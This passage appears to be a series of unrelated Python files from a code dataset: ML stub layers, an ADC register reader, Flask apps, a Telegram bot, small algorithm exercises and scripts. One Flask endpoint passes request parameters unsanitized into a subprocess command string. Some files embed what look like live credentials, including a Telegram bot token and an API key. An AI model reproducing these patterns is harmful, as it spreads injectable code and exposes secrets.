'placeholder'\n self.layer_name = 'input'\n\n def __call__(self, *args, **kwargs):\n if self.layer_factory is not None:\n layer = self.layer_factory.input(self.shape)\n return layer(*args, **kwargs)\n\n raise NotImplementedError\n\n\nclass BaseStubBatchNormalization2d(StubLayer):\n def __init__(self, input=None, output=None, **kwargs):\n super(BaseStubBatchNormalization2d, self).__init__(input, output, **kwargs)\n self.layer_type = 'bn'\n self.layer_name = 'bn2d'\n self.n_dim = 2\n\n def flops(self):\n return self.input.shape[1]*self.input.shape[2]*self.input.shape[3]*2\n\n def __call__(self, *args, **kwargs):\n if self.layer_factory is not None:\n layer = self.layer_factory.bn2d(block_name=self.block_name,\n cell_name=self.cell_name)\n return layer(*args, **kwargs)\n\n raise NotImplementedError\n\n\nclass BaseStubBilinearResize(StubLayer):\n def __init__(self, height, width, input=None, output=None, **kwargs):\n super(BaseStubBilinearResize, self).__init__(input, output, **kwargs)\n self.height = 
height\n self.width = width\n self.layer_type = 'resize'\n self.layer_name = 'bilinear_resize'\n\n @property\n def output_shape(self):\n return (self.input.shape[0], self.height, self.width, self.input.shape[-1])\n\n def flops(self):\n return self.input.shape[1] * self.input.shape[2] * self.input.shape[3] * 7\n\n def __call__(self, *args, **kwargs):\n if self.layer_factory is not None:\n layer = self.layer_factory.bilinear_resize(self.height,\n self.width,\n block_name=self.block_name,\n cell_name=self.cell_name)\n return layer(*args, **kwargs)\n\n raise NotImplementedError\n\n\nclass BaseLayerFactory(object):\n def __init__(self):\n pass\n\n def __getattr__(self, item):\n if item not in ['dense',\n 'conv2d',\n 'separable_conv2d',\n 'concat',\n 'add',\n 'dot',\n 'avg_pool2d',\n 'max_pool2d',\n 'global_pool2d',\n 'relu',\n 'flatten',\n 'relu6',\n 'bn2d',\n 'softmax',\n 'sigmoid',\n 'dropout_2d',\n 'bilinear_resize',\n 'spp',\n 'identity',\n 'input']:\n return getattr(super(BaseLayerFactory, self), item)\n\n def func(*args, **kwargs):\n if item == 'dense':\n return BaseStubDense(*args, **kwargs)\n elif item == 'conv2d':\n return BaseStubConv2d(*args, **kwargs)\n elif item == 'separable_conv2d':\n return BaseStubSeparableConv2d(*args, **kwargs)\n elif item == 'spp':\n return BaseStubSPP(*args, **kwargs)\n elif item == 'concat':\n return BaseStubConcatenate(*args, **kwargs)\n elif item == 'add':\n return BaseStubAdd(*args, **kwargs)\n elif item == 'dot':\n return BaseStubDot(*args, **kwargs)\n elif item == 'avg_pool2d':\n return BaseStubAvgPooling2d(*args, **kwargs)\n elif item == 'max_pool2d':\n return BaseStubMaxPooling2d(*args, **kwargs)\n elif item == 'global_pool2d':\n return BaseStubGlobalPooling2d(*args, **kwargs)\n elif item == 'relu':\n return BaseStubReLU(*args, **kwargs)\n elif item == 'relu6':\n return BaseStubReLU6(*args, **kwargs)\n elif item == 'flatten':\n return BaseStubFlatten(*args, **kwargs)\n elif item == 'bn2d':\n return BaseStubBatchNormalization2d(*args, **kwargs)\n elif item == 'softmax':\n return BaseStubSoftmax(*args, **kwargs)\n elif item == 'sigmoid':\n return BaseStubSigmoid(*args, **kwargs)\n elif item == 'dropout_2d':\n return BaseStubDropout2d(*args, **kwargs)\n elif item == 'bilinear_resize':\n return BaseStubBilinearResize(*args, **kwargs)\n elif item == 'identity':\n return BaseStubIdentity(*args, **kwargs)\n elif item == 'input':\n return BaseStubInput(*args, **kwargs)\n\n return func\n","sub_path":"antgo/automl/basestublayers.py","file_name":"basestublayers.py","file_ext":"py","file_size_in_byte":22360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"57199229","text":"#!/usr/bin/python3\n\nfrom uio import Uio\nimport ctypes\nfrom ctypes import c_uint32 as uint\nfrom ctypes import c_byte as byte\n\n########## ADC #####################################\n#\n# This will test the ADC Status Register\n# Adapted from zmatt's l3-sn-test.py\nfrom ctypes import Structure\n\nclass IterableStructure(Structure):\n def __getitem__(self, i):\n if not isinstance(i, int):\n raise TypeError('subindices must be integers: %r' % i)\n return getattr(self, self._fields_[i][0])\n\nadc = Uio( \"adc\" )\nclass Step( IterableStructure ):\n _fields_ = [\n (\"stepconfig\", uint, 32),\n (\"stepdelay\", uint, 32),\n ];\nclass ADC( IterableStructure ):\n _fields_ = [\n (\"revision\", uint, 32),\n (\"spacer01\", byte*(0x10-4)),\n (\"sysconfig\", uint, 32),\n (\"spacer02\", byte*16),\n (\"irqstatus_raw\", uint, 32),\n (\"irqstatus\", 
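# --- Hedged aside on the pattern this struct uses: a ctypes Structure
# mapped over a register block only works if the field offsets match the
# hardware manual, and the spacer arrays exist purely to keep those offsets
# aligned. ctypes can verify that directly (illustrative mini-layout, not
# the full ADC block):
import ctypes
from ctypes import c_uint32 as uint, c_byte as byte

class Regs(ctypes.Structure):
    _fields_ = [
        ("revision", uint),
        ("_pad", byte * (0x10 - 4)),   # reserved gap up to offset 0x10
        ("sysconfig", uint),
    ]

assert Regs.sysconfig.offset == 0x10   # padding keeps the map aligned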
uint, 32),\n (\"irqenable_set\", uint, 32),\n (\"irqenable_clr\", uint, 32),\n (\"irqwakeup\", uint, 32),\n (\"dmaenable_set\", uint, 32),\n (\"dmaenable_clr\", uint, 32),\n (\"ctrl\", uint, 32),\n (\"adcstat\", uint, 32),\n (\"adcrange\", uint, 32),\n (\"adc_clkdiv\", uint, 32),\n (\"adc_misc\", uint, 32),\n (\"stepenable\", uint, 32),\n (\"idleconfig\", uint, 32),\n (\"ts_charge_stepconfig\", uint, 32),\n (\"ts_charge_delay\", uint, 32),\n (\"steps\", Step*16),\n (\"fifo0count\", uint, 32),\n (\"fifo0threshold\", uint, 32),\n (\"dma0req\", uint, 32),\n (\"fifo1count\", uint, 32),\n (\"fifo1threshold\", uint, 32),\n (\"dma1req\", uint, 32),\n (\"spacer03\", byte*4),\n (\"fifo0data\", uint, 32),\n (\"spacer04\", byte*0xFC),\n (\"fifo1data\", uint, 32)\n ];\ntestStatus = adc.map(ADC)\ni = 0\nfor x in testStatus:\n# if ( i % 5 == 0):\n# input(\"Press Enter to Continue:\")\n if isinstance(x, int):\n print(hex(i), \": \", format(x, '0{0}b'.format(32)), end=\"\")\n i = i + 4\n if hasattr(x, \"__len__\"):\n for x2 in x:\n if isinstance(x2, Step):\n for x3 in x2:\n if isinstance(x3, int):\n print(hex(i), \": \", format(x3, '0{0}b'.format(32)))\n i = i + 4\n else:\n print(hex(i), \": \" , \"BUFFER: \", x2.__sizeof__())\n i = i + 1\n# if (i % 5 == 0):\n# input(\"Press Enter to Continue:\")\n else:\n print(\"<\")\n","sub_path":"adc-test.py","file_name":"adc-test.py","file_ext":"py","file_size_in_byte":2486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"9183083","text":"from flask import Flask, jsonify, request\nfrom flask_cors import CORS, cross_origin\nimport pandas as pd\nimport numpy as np\nimport subprocess\nimport json\n\n\napp = Flask(__name__)\n\ncors = CORS(app)\napp.config['CORS_HEADERS'] = 'Content-Type'\n\n@app.route('/da', methods=['GET'])\n@cross_origin()\ndef process():\n print(request.args)\n option1 = request.args.get(\"sele1\")\n option2 = request.args.get(\"sele2\")\n option3 = request.args.get(\"tipo\")\n option2 = option2.replace(' ', '_')\n print(option1)\n print(option2)\n print(option3)\n\n if(option2 == \"Avenida_Padre_Julio_Fragata\"):\n option2 = \"padre_julio_fragata\"\n subprocess.call('python LSTM_model.py ' + option3 + ' ' + option1 + ' ' + option2)\n if(option2 == \"S._Vitor\" and option3 == \"curto\"):\n print(\"Entrei\")\n option2 = \"svitor\"\n if(option2 == \"S._Vitor\" and option3 == \"longo\"):\n option2 = \"svitor\"\n\n csvp = \"prediction\" + option2 + \"curto\" + \".csv\"\n\n data = pd.read_csv(csvp)\n\n data = data.reset_index().to_json(orient='records')\n\n print(data)\n\n\n #data.drop([\"Atual\"],axis=1, inplace=True)\n #print(data)\n #data_matrix = data.to_records()\n #print(data_matrix)\n #print(data_matrix.tolist())\n #js = {}\n #for i in data_matrix.tolist():\n # js[i[1]] = i[2]\n\n #print(jsonify(js))\n #print(json.dumps(js))\n return jsonify(data)\n\nif __name__ == '__main__':\n app.run()\n ","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"297585550","text":"# Created by Aashish Adhikari at 10:00 AM 1/15/2021\n\n'''\nTime Complexity:\nO(n) since we traverse to each node once.\n\nSpace Complexity:\nO(height of the tree) as we are maintaining a recursive stack under the hood.\n'''\n\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = 
right\nclass Solution(object):\n\n def helper(self, node, current_sum):\n\n\n\n # base case\n if node.left is None and node.right is None:\n self.total += ((current_sum* 10) + node.val)\n\n if node.left is not None:\n self.helper(node.left, (current_sum* 10) + node.val)\n\n if node.right is not None:\n self.helper(node.right, (current_sum* 10) + node.val)\n\n def sumNumbers(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: int\n \"\"\"\n\n if root is None:\n return 0\n\n self.total = 0\n\n self.helper(root, self.total)\n\n return self.total","sub_path":"Sum_Root_to_Leaf_Numbers_Recursive_with_No_DeepCopy.py","file_name":"Sum_Root_to_Leaf_Numbers_Recursive_with_No_DeepCopy.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"133986900","text":"#Given a compressed string of the form \"3[ab2[c]]\" return the decompressed string: \"abccabccabcc\"\n# O(n)\n\n\ndef decompress(s):\n \n if (len(s) == 0): \n return \"\"\n else:\n rStr = ''\n sStr = ''\n n = '' \n inner = []\n for each in s:\n if (ord(each) in range (65,91) or ord(each) in range (97,123)): # is an alphabet\n rStr = rStr+each\n if ord(each) in range (48,58): # get the count before the bracket\n n = n + each\n if (each=='['):\n inner = s[s.index(each)+1:-1] #inner will be everything within the square brackets\n #inner.append(s[s.index(each)+1])\n i = 0\n \n while(i0:\n answer = answer + decompress(''.join(l))\n l = []\n brackets = [];\n prevbracket =''\n currentbracket = ''\n n = 0\n m = 0\n \n answer = answer + decompress(''.join(l))\n return answer\n\n'''\ndef splitStr(lStr):\n tempList = []\n tempList = lStr.split('.')\n answer = ''\n for each in tempList:\n answer = answer + decompress(each)\n return answer\n''' \n \n \n\n#print(splitStr(tokenise('z3[a2[b]]2[a]'))) \n\nprint(decompress(\"z3[a2[b]]rty3[ab]\"))\nprint(decompress(\"z1[a]\"))\nprint(decompress(\"zab\"))\nprint(decompress(\"2[2[zab]3[rtu]]\"))\nprint(len(decompress('0[a2[b]]')))\nprint('z3[a2[b]].2[a].'.split('.'))\n'''\nprint (tokenise('2z3[a2[b]]'))\nprint (tokenise(''))\nprint (tokenise('ab'))\nprint (tokenise('3[s]'))\nprint (tokenise(\"3[a]2[bc]\")) # return \"aaabcbc\".\nprint (tokenise(\"3[a2[c]]\")) # return \"accaccacc\".\nprint (tokenise(\"2[abc]3[cd]ef\")) # return \"abcabccdcdcdef\".\nprint (tokenise(\"2[abc4[ed4[u]]]3[cd]ef\"))\nprint (tokenise(\"zxdsef\"))\nprint (tokenise(\"zxd9[i2[jh]]sef\"))\n'''\n#print (tokenise(\"zxd9000[i2[jh]]sef\"))\n","sub_path":"python/Ghain/decompress.py","file_name":"decompress.py","file_ext":"py","file_size_in_byte":2677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"529407054","text":"from flask import Flask, request,redirect,url_for, jsonify,render_template,session\nfrom flask_mysqldb import MySQL\n\n\nimport numpy as np\nimport pickle\nfrom bs4 import BeautifulSoup\nimport re\nimport nltk\nfrom nltk.corpus import stopwords\nfrom nltk.stem.wordnet import WordNetLemmatizer\n\n\ndef removeHTMLTags(sentences):\n soup = BeautifulSoup(sentences, 'lxml')\n return soup.get_text()\n\ndef removeApostrophe(sentences):\n phrase = re.sub(r\"won't\", \"will not\", sentences)\n phrase = re.sub(r\"can\\'t\", \"can not\", sentences)\n phrase = re.sub(r\"n\\'t\", \" not\", sentences)\n phrase = re.sub(r\"\\'re\", \" are\", sentences)\n phrase = re.sub(r\"\\'s\", \" is\", sentences)\n phrase = re.sub(r\"\\'d\", \" would\", sentences)\n phrase = re.sub(r\"\\'ll\", \" will\", 
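# --- Hedged alternative (not the original algorithm): the nested-bracket
# decompression a few records above is usually done with an explicit stack
# in a single pass, which sidesteps all of the recursive index bookkeeping:
def decompress_iter(s):
    stack = [["", 1]]          # pairs of (accumulated text, repeat count)
    num = ""
    for ch in s:
        if ch.isdigit():
            num += ch                       # multi-digit counts like "12["
        elif ch == "[":
            stack.append(["", int(num)])    # open a new nesting level
            num = ""
        elif ch == "]":
            text, k = stack.pop()           # close it and repeat its text
            stack[-1][0] += text * k
        else:
            stack[-1][0] += ch
    return stack[0][0]

# decompress_iter("3[ab2[c]]") -> "abccabccabcc"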
sentences)\n phrase = re.sub(r\"\\'t\", \" not\", sentences)\n phrase = re.sub(r\"\\'ve\", \" have\", sentences)\n phrase = re.sub(r\"\\'m\", \" am\", sentences)\n return phrase\n\ndef removeAlphaNumericWords(sentences):\n return re.sub(\"\\S*\\d\\S*\", \"\", sentences).strip()\n\ndef removeSpecialChars(sentences):\n return re.sub('[^a-zA-Z]', ' ', sentences)\n\ndef doTextCleaning(sentences):\n sentences = removeHTMLTags(sentences)\n sentences = removeApostrophe(sentences)\n sentences = removeAlphaNumericWords(sentences)\n sentences = removeSpecialChars(sentences) \n # Lower casing\n sentences = sentences.lower() \n #Tokenization\n sentences = sentences.split()\n #Removing Stopwords and Lemmatization\n lmtzr = WordNetLemmatizer()\n sentences = [lmtzr.lemmatize(word, 'v') for word in sentences if not word in set(stopwords.words('english'))]\n sentences = \" \".join(sentences) \n return sentences\n\napp = Flask(__name__)\napp.secret_key = \"kalai\" \n\n#DB connection:\napp.config['MYSQL_HOST'] = 'localhost'\napp.config['MYSQL_USER'] = 'root'\napp.config['MYSQL_PASSWORD'] = ''\napp.config['MYSQL_DB'] = 'nlp'\n\nmysql = MySQL(app)\n\n\nmodel = pickle.load(open('GNmodel.pkl','rb'))\nvectorizer = pickle.load(open('supervectorizer.pkl','rb'))\n\n@app.route('/')\ndef index():\n cur = mysql.connection.cursor()\n cur.execute(\"SELECT * FROM comments\")\n data=cur.fetchall()\n cur.execute(\"SELECT count(*) FROM comments WHERE type=1\")\n t1=cur.fetchone()[0]\n cur.execute(\"SELECT count(*) FROM comments WHERE type=0\")\n t0=cur.fetchone()[0]\n cur.close()\n return render_template('index.html',data=data,text=[t0,t1])\n\n\n@app.route('/predict',methods=['POST'])\ndef predict():\n sentence=request.form['textData']\n normaltext=request.form['textData']\n #print(sentence)\n sentence = doTextCleaning(sentence)\n sentence = vectorizer.transform([sentence]).toarray() \n prediction = model.predict(sentence)\n output = prediction[0]\n session['output']=str(output)\n \n #insert into comments table.\n cur = mysql.connection.cursor()\n cur.execute(\"INSERT INTO comments(comment,type) VALUES (%s, %s)\", (normaltext, str(output)))\n mysql.connection.commit()\n cur.close()\n \n return redirect(url_for('index'))\n \n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"41357202","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\n\nseries = pd.read_csv('Digkilaan_trimmed.csv')\nseries['date_and_time'] = series['YEAR'].map(str) + '-'+ series['MONTH'].map(str) + '-'+ series['DAY'].map(str) + ' ' + series['TIME'].map(str)\n\n\ndate_and_time = series['date_and_time'].tolist()\nrainfall = series['RAINFALL']\nwaterlevel = rainfall\nwaterlevel = waterlevel.tolist()\n\nvalues = waterlevel\ntimestamps = pd.to_datetime(date_and_time)\n\nts = pd.Series(values, index=timestamps)\nts = ts.resample('15T').mean()\n\nts.interpolate(method='spline', order=3).plot()\nts.interpolate(method='time').plot()\nts.interpolate(method='linear', inplace=True)\n\n\nprint(str(ts))\nts.columns = ['DATETIME', 'RAINFALL']\nts.to_csv('Digkilaan_interpol.csv')\nlines, labels = plt.gca().get_legend_handles_labels()\nlabels = ['spline', 'time']\nplt.legend(lines, labels, 
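# --- Hedged recap: the rainfall script's core move is resample-then-
# interpolate on a DatetimeIndex. A minimal standalone version of just that
# pipeline (older pandas spells the 15-minute alias '15T', as the script
# does; newer releases prefer '15min'):
import pandas as pd

ts = pd.Series([1.0, 4.0],
               index=pd.to_datetime(["2020-01-01 00:00", "2020-01-01 01:00"]))
ts15 = ts.resample("15T").mean()          # empty 15-min bins become NaN
ts15 = ts15.interpolate(method="time")    # fill them proportionally to time
# ts15 -> 1.0, 1.75, 2.5, 3.25, 4.0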
loc='best')\nplt.show()\n\n\n","sub_path":"Scripts_Arch2_nfs/rainfall_interpolation.py","file_name":"rainfall_interpolation.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"394027630","text":"import telebot\nimport socks, time\nfrom BotPoem import get_poem\nimport socks, requests\nfrom telebot import apihelper\n\n\nproxyDict = {\n \"http\": \"socks5h://34.84.57.254:22080\",\n \"https\": \"socks5h://34.84.57.254:22080\"\n}\n\ndef bot_():\n global proxyDict\n apihelper.proxy = proxyDict\n bot = telebot.TeleBot('')\n\n @bot.message_handler(commands=['start'])\n def start_message(message):\n bot.send_message(message.chat.id, 'дорова, ебеныть), я умею писать стихи, напиши расскажи стишок или что-то подобное и я поделюсь с тобой своим творением, божьим словом так сказать')\n\n @bot.message_handler(content_types=[\"photo\"])\n def send_photo(message):\n\n id_ = message.photo[-1].file_id\n path = bot.get_file(id_)\n print(path)\n download_file = bot.download_file(file_path=path.file_path)\n print(download_file)\n #request = requests.get(f\"https://api.telegram.org/file/bot832044201:AAHjNFU5hV9xSpl7bqbn3CC3yIGDSzyFbHQ/{path}\", proxies=proxyDict)\n @bot.message_handler(content_types=['text'])\n def send_text(message):\n\n if \"расс\" in message.text.lower() or \"поведай\" in message.text.lower() or 'еще' in message.text.lower() or \"ещё\" in message.text.lower():\n poem = \"\"\"\"\"\"\n for sentence in get_poem():\n poem += sentence\n print(poem)\n bot.send_message(message.chat.id, poem)\n\n bot.polling(timeout=123)\n\n\nbot_()\n","sub_path":"new_main.py","file_name":"new_main.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"66502356","text":"class Movie:\r\n \"\"\"The Movie Class.\r\n\r\n Defines the information of a movie\r\n\r\n Attributes:\r\n name: The movie title\r\n image: The movie poster\r\n trailer: A link to The movie trailer\r\n box_art: An optional variable for a box art image of the movie\r\n \"\"\"\r\n \r\n def __init__(self, name, image, trailer, box_art=None):\r\n if box_art is not None:\r\n self.name = name\r\n self.box_art = box_art\r\n self.image = image\r\n self.trailer = trailer\r\n else:\r\n self.name = name\r\n self.image = image\r\n self.trailer = trailer\r\n","sub_path":"media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"398892855","text":"import requests\nimport json\n\n\n# Author : Kunal Anand\n# The code is successfully returning containment zones in a given radius to a given location\n\ndef getContainmentLocations(latitude, longitude, radius):\n print('In function')\n\n url = 'https://data.geoiq.io/dataapis/v1.0/covid/nearbyzones'\n\n headers = {'Content-Type': 'application/json'}\n\n payload = {\n\n 'key': 'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJtYWlsSWRlbnRpdHkiOiJzYW5hdGhyYW1lc2g1NUBnbWFpbC5jb20ifQ'\n '.eg7KCzdygU7dp9Rp7PJlVd9AAthaQvn0ROBEn0z3jWk',\n\n 'lng': longitude,\n\n 'lat': latitude,\n\n 'radius': radius\n\n }\n\n print(payload[\"lat\"], payload[\"lng\"])\n\n resp = requests.post(url=url, headers=headers, data=json.dumps(payload))\n\n result = json.loads(resp.content)\n\n print(result)\n\n return result\n\n\ndef handleContainmentrequests(root, tablepath, longitude, latitude, distance):\n response = getContainmentLocations(latitude, 
longitude, distance)\n\n root.child(tablepath).push(response)\n\n\n# print(getContainmentLocations(26.91561, 75.76125, 5000))\n","sub_path":"Server/code/NearbyContainmentRequestHandler.py","file_name":"NearbyContainmentRequestHandler.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"53764855","text":"\"\"\"\nThis folder contains archived practice scripts from Mr. Gabiste Akoua's Udemy course:\n\"Selenium WebDriver with Python - Basics to Intermediate\"\nWhich can be found in below link:\nhttps://www.udemy.com/selenium-webdriver-with-python/#/\nCourse covered a wide range of features, highly recommended.\n\"\"\"\nfrom selenium import webdriver \nfrom selenium.webdriver.support.ui import WebDriverWait \nfrom selenium.webdriver.common.by import By \nfrom selenium.webdriver.common.action_chains import ActionChains \nfrom selenium.webdriver.common.keys import Keys \nimport unittest \nimport time \n\nclass selectOption(unittest.TestCase):\n\n def setUp(self):\n global driver \n driver = webdriver.Firefox() \n driver.get(\"http://travelingtony.weebly.com/store/p1/Leatherback_Turtle_Picture.html\")\n driver.maximize_window() \n\n def test_DropdownArrowDown(self):\n ## Locators \n dropDownID = \".//*[@id='wsite-com-product-option-Quantity']\"\n dropDownElement = WebDriverWait(driver, 10).\\\n until(lambda driver: driver.find_element_by_xpath(dropDownID))\n\n ## Actions \n actions = ActionChains(driver)\n actions.send_keys_to_element(dropDownElement, Keys.ENTER)\n actions.send_keys(Keys.ARROW_DOWN)\n actions.send_keys(Keys.ARROW_DOWN)\n actions.perform()\n ## Adding time.sleep() to allow user to see last webdriver action; use in tests otherwise not recommended\n time.sleep(10)\n\n def tearDown(self):\n driver.quit() \n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"selectOption.py","file_name":"selectOption.py","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"573432499","text":"#!/usr/bin/python\n############################################################\n####\tAnalyzing peak distribution of rotational\t########\n####\t\t\toscillation spectra\t\t\t\t\t########\n####\t\t\t\t\t\t\t\t\t\t\t\t########\n####\tauthor: Umut Elicabuk\t\t\t\t\t\t########\n####\tdate: 11/05/2017\t\t\t\t\t\t\t########\n####\t\t\t\t\t\t\t\t\t\t\t\t########\n############################################################\n\nfrom __future__ import division, print_function\nimport sys\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.signal import find_peaks_cwt\nimport os.path\nimport peakutils\nfrom scipy.optimize import curve_fit\nfrom matplotlib.backends.backend_pdf import PdfPages\nimport matplotlib.pyplot as plt\n\n#saves figures into one multipage pdf\ndef multipage(filename, figs=None, dpi=200):\n pp = PdfPages(filename)\n if figs is None:\n figs = [plt.figure(n) for n in plt.get_fignums()]\n for fig in figs:\n fig.savefig(pp, format='pdf')\n pp.close()\n\n#shell\nif len(sys.argv) != 3:\n\tquit('Usage: .//analyze.py ')\n\nif not os.path.isfile(sys.argv[2]):\n\tquit('The specified file does not exist.')\n\n#load data\nX, Y = np.loadtxt(sys.argv[2], unpack=True)\n\n#plot data\nfig1 = plt.figure()\nplt.plot(X, Y, linewidth=0.1)\nplt.xlabel(r'wavenumber in $cm^{-1}$')\nplt.ylabel('optical density')\nplt.grid()\n\n#peak detection (Yeah, I probably should have filtered before.\n#\t\t\t\tThen again: it's 
just a worksheet.)\nindexes\t= peakutils.indexes(Y, thres=0.02/max(Y), min_dist=55)\n\n#mark peaks\nplt.plot(X[indexes], Y[indexes], ls='', marker='o', markersize=2, color=\"red\")\n\n#find index of lowest peak\nwmin=10\nargmin = 0\n\nindexes = indexes[5:-3] #first and last few peaks are just noise, cut those off, f*** the police\n\nfor i in indexes:\n\tif Y[i] < wmin:\n\t\twmin = Y[i]\n\t\targmin = i\n\n#mark lowest peak\nplt.plot(X[argmin], Y[argmin], marker='o', markersize=2, color='xkcd:teal')\n\n#print lowest wavenumber\nprint('omega_0 =%.2f' %X[argmin], '\\n')\n\n#print p-branch\nj=1\nprint('p-branch:\\nwaveno.[cm^-1]\\tj0\\tj1')\nfor i in indexes:\n\tif X[i] < X[argmin]:\n\t\tprint('%.2f\\t\\t%i\\t%i' %(X[i], j, j-1))\n\t\tj=j+1\n\n#print r-branch\nj=0\nprint('\\nr-branch:\\nwaveno.[cm^-1]\\tj0\\tj1')\nfor i in indexes:\n\tif X[i] > X[argmin]:\n\t\tprint('%.2f\\t\\t%i\\t%i' %(X[i], j, j+1))\n\t\tj=j+1\n\n#prepare peak diffs\n#slice indexes (comparing to output of procedure above to find indexes)\nindexes_p = indexes[:12]\t#TODO: Remove hard-coded shit.\nindexes_r = indexes[13:]\t#TODO: Remove hard-coded shit.\ndiff_p = np.zeros(indexes_p.size-1)\ndiff_r = np.zeros(indexes_r.size-1)\n\n#calculate diffs\nfor i in range(0, len(indexes_p)-1):\n\tdiff_p[i]=X[indexes_p[i+1]]-X[indexes_p[i]]\nfor i in range(0, len(indexes_r)-1):\n\tdiff_r[i]=X[indexes_r[i+1]]-X[indexes_r[i]]\n\nprint('\\ndiffs of p-branch:\\n', diff_p, '\\n')\nprint('\\ndiffs of r-branch:\\n', diff_r, '\\n')\n\n#fit\ndef pbranch(j, B0, B1):\n\treturn 2*B0 + 2*(B0-B1)*j\n\ndef rbranch(j, B0, B1):\n\treturn 2*(2*B1-B0)+2*(B1-B0)*j\n\nX_p = np.arange(0, len(indexes_p)-1, 1)\nX_r = np.arange(0, len(indexes_r)-1, 1)\n\npoptp, pcovp = curve_fit(pbranch, X_p, diff_p)\npoptr, pcovr = curve_fit(rbranch, X_r, diff_r)\n\nfig2 = plt.figure()\nplt.plot(X_p, pbranch(X_p, poptp[0], poptp[1]), label='p-branch')\nplt.plot(X_r, rbranch(X_r, poptr[0], poptr[1]), label='r-branch')\nplt.xlabel(r'quantum number $j_0$')\nplt.ylabel(r'$\\Delta\\omega$ in $cm^{-1}$')\nplt.grid()\nplt.legend()\n\nprint('p-branch: B0 = %.2f,\\tB1 = %.2f' %(poptp[0], poptp[1]))\nprint('r-branch: B0 = %.2f,\\tB1 = %.2f' %(poptr[0], poptr[1]))\n\n#shell\nif sys.argv[1].lower() == 'show':\n\tplt.show()\nelif sys.argv[1].lower() == 'save':\n\tmultipage('output.pdf')\nelse:\n\tquit('Usage: .//analyze.py !>>> <<')\n","sub_path":"rotationalspectrum/analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":3653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"7949963","text":"from django.core.exceptions import ObjectDoesNotExist\nfrom django.contrib.auth.models import User\nfrom django.shortcuts import render, redirect\nfrom django.views import View\nfrom twitter.models import (Tweet, Message)\nfrom twitter.forms import (TweetForm, MessageRespondForm)\n\n\n# Create your views here.\n\nclass Homepage(View):\n def get(self, request):\n form = TweetForm()\n tweets = Tweet.objects.all()\n return render(request, 'homepage.html', {'form': form, 'tweets': tweets})\n\n def post(self, request):\n form = TweetForm(request.POST)\n if form.is_valid():\n content = form.cleaned_data['content']\n tweet = Tweet.objects.create(content=content, user=request.user)\n return redirect('Homepage')\n\n\nclass Profile(View):\n def get(self, request, user_id=None):\n if user_id is None:\n user_id = request.user.id\n try:\n user = User.objects.get(pk=user_id)\n except ObjectDoesNotExist:\n return redirect('Profile')\n user_tweets = 
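# --- Hedged aside on the branch fits above: pbranch and rbranch are
# straight lines in j, so curve_fit here is just least-squares line
# fitting. A tiny synthetic self-check of that reduction:
import numpy as np
from scipy.optimize import curve_fit

def line(j, a, b):
    return a + b * j

j = np.arange(12)
dw = 20.0 - 0.5 * j                     # synthetic peak spacings
(a, b), _ = curve_fit(line, j, dw)
# a ~ 20.0 and b ~ -0.5; with pbranch() the intercept is 2*B0 and the
# slope is 2*(B0 - B1), which is how the script recovers the rotational
# constants from the peak spacings.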
Tweet.objects.filter(user__username=user.username)\n return render(request, 'profile.html', {'user': user, 'user_tweets': user_tweets})\n\n\nclass MessagesReceived(View):\n def get(self, request, from_id=0):\n respond_form = MessageRespondForm()\n user_id = request.user.id\n messages = Message.objects.filter(to_user=user_id).order_by('creation_date')\n sent = Message.objects.filter(from_user=user_id).order_by('creation_date')\n last = messages.last()\n try:\n message_details = Message.objects.get(pk=from_id)\n message_details.seen = True\n message_details.save()\n except ObjectDoesNotExist:\n return render(request, 'messages.html',\n {'messages': messages, 'sent': sent, 'message_details': last, 'respond_form': respond_form})\n test_sender = Message.objects.get(pk=from_id).to_user.get_queryset().first()\n test_receiver = Message.objects.get(pk=from_id).from_user.get_queryset().first()\n if test_sender == request.user or test_receiver == request.user:\n return render(request, 'messages.html',\n {'messages': messages, 'sent': sent, 'message_details': message_details,\n 'respond_form': respond_form})\n else:\n return render(request, 'messages.html',\n {'messages': messages, 'sent': sent, 'message_details': last, 'respond_form': respond_form})\n\n\nclass MessagesSent(View):\n pass\n","sub_path":"twitter/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"475765425","text":"import pyperclip\n\ntext = pyperclip.paste()\n\n#To do: seperate lines and add star\nlines = text.split('\\n')\nfor i in range(len(lines)):\n lines[i] = '* ' + lines[i]\ntext = '\\n'.join(lines)\n\n#Make the text to uppercase.\n#text = 